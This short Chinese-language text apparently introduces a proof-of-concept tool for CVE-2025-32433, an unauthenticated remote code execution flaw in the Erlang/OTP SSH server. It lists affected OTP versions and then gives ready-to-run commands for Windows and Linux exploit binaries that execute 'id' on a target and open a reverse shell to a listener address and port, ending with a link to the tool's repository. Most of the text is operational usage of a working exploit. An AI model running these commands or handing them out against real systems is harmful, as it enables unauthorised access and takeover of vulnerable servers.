在 Erlang/OTP SSH 服务器中发现了一个严重漏洞,可能允许攻击者执行未经身份验证的远程代码执行(RCE)。通过利用 SSH 协议消息处理中的缺陷,恶意攻击者可以在没有有效凭据的情况下获得对受影响系统的未授权访问并执行任意命令。这可能导致上述主机受损,从而允许第三方未经授权访问和操纵敏感数据,或发起拒绝服务攻击。
OTP-27.3.2 及更早版本
OTP-26.2.5.10 及更早版本
OTP-25.3.2.19 及更早版本
cve-2025-32433.exe 127.0.0.1 -c 'id'
./cve-2025-32433.lnx 127.0.0.1 -c 'id'
cve-2025-32433.exe 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444
./cve-2025-32433.lnx 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

https://github.com/omer-efe-curkus/CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC